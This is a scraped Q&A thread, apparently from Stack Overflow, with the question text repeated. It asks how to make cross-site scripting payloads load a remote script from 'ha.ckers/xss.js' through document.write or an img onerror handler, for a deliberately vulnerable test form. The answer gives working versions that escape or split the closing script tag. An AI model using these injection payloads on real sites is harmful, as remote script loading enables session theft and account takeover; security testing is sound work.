How do i load an external .js script using this syntax?:

<script>document.write('<script src=.js></script>')</script>.

For all those wondering, i setup a test form i made purposely vulnerable but i couldn't get this to launch and yes i know :

<script src=//ha.ckers/xss.js></script>

Could easily work but i'm just trying to figure out how i could do it using document.write.

Thanks to anyone who is able to help me. //Edit Why doesn't this work? <img src=x onerror=document.write('<script src=".js"><\/script>')>

How do i load an external .js script using this syntax?:

<script>document.write('<script src=http://ha.ckers/xss.js></script>')</script>.

For all those wondering, i setup a test form i made purposely vulnerable but i couldn't get this to launch and yes i know :

<script src=//ha.ckers/xss.js></script>

Could easily work but i'm just trying to figure out how i could do it using document.write.

Thanks to anyone who is able to help me. //Edit Why doesn't this work? <img src=x onerror=document.write('<script src="http://ha.ckers/xss.js"><\/script>')>

• javascript
• xss

Share Improve this question Follow edited Jul 3, 2013 at 22:24 user2536979 asked Jul 3, 2013 at 22:15 user2536979user2536979 3111 gold badge33 silver badges88 bronze badges 1

• You have to escape the </script> tag: <\/script> - otherwise the piler will end the JS with that tag and not with the right one – Niccolò Campolungo Commented Jul 3, 2013 at 22:16

Add a ment  | 

1 Answer 1

Sorted by: Reset to default 1

What you have to remember is that what lies within the <script>....</script> tags is opaque to the browser. Its job is, having seen <script>, to gather up everything largely without parsing it until it sees </script> and then had that intervening text off to the JavaScript engine.

In your case, what it sees between <script> and </script> is:

document.write('<script src=http://ha.ckers/xss.js>

...which obviously results in a syntax error. That's because the first </script> terminates the first <script>:

<script>document.write('<script src=http://ha.ckers/xss.js></script>')</script>
<!-- Browser thinks things end here ---------------------------^ -->

You have to break it up so it's not the literal sequence </script>. There are lots of ways to do that. Add a \:

<script>document.write('<script src=http://ha.ckers/xss.js><\/script>')</script>

or break the string:

<script>document.write('<script src=http://ha.ckers/xss.js></scr' + 'ipt>')</script>